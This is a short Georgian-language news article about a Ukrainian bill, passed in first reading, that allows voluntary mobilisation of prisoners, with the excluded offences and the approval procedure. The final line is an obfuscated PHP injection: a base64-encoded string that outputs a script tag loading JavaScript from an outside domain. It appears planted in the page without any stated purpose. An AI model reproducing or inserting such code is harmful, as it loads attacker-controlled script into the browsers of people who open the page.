celsiusi
ავერსი შნაიდერი

 უკრაინის უმაღლესმა რადამ პირველი მოსმენით მიიღო კანონპროექტი, რომლითაც შესაძლებელი ხდება სამხედრო სამსახურისთვის პატიმრების ნებაყოფლობითი მობილიზება. როგორც უკრაინული მედია წერს, კანონპროექტი ითვალისწინებს საომარ მოქმედებებში მსჯავრდებულთა ნებაყოფლობით მონაწილეობას.

უკრაინის რადას დეპუტატმა, ელენა შულიაკმა თქვა, რომ პატიმრები მობილიზებას არ ექვემდებარებიან შემდეგი დანაშაულისთვის:  უკრაინის ეროვნული უსაფრთხოების საფუძვლების წინააღმდეგ ჩადენილი დანაშული; ორი ან მეტი ადამიანის განზრახ მკვლელობა ან გაუპატიურებასთან ერთად; სექსუალური ძალადობა.

შულიაკმა თქვა, რომ პატიმარმა ჯერ სამხედრო სამსახურისთვის შესაბამისი განცხადება უნდა წარადგინოს დაწესებულებაში, სადაც სასჯელს იხდის, ამის შემდეგ მან ციხეში უნდა გაიაროს სამედიცინო შემოწმება და შემდეგ კი, მისი მონაცემები გადადის სამხედრო გაწვევის სამსახურში, სადაც სამხედრო ნაწილი განიხილავს მობილიზაციის შესაძლებლობას.

სამხედრო გაწვევის სამსახურის გადაწყვეტილების შემდეგ, შემოწმებას ატარებს სამხედრო სამედიცინო კომისია და მხოლოდ იმ შემთხვევაში, თუ პატიმრის ფიზიოლოგიური და ფსიქიკური მდგომარეობა აკმაყოფილებს მოთხოვნებს, მისი განცხადება დოკუმენტების პაკეტთან ერთად გადადის სასამართლოში, რომელიც იღებს გადაწყვეტილებას.

შულიაკი აღნიშნავს, რომ თუ სასამართლოს გადაწყვეტილება დადებითი იქნება, ეროვნული გვარდია მსჯავრდებულს გადასცემს სამხედრო გაწვევის სამსახურს, სადაც იქმნება სამხედრო ნაწილების შესაბამისი სპეციალიზებული დანაყოფები.

185
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");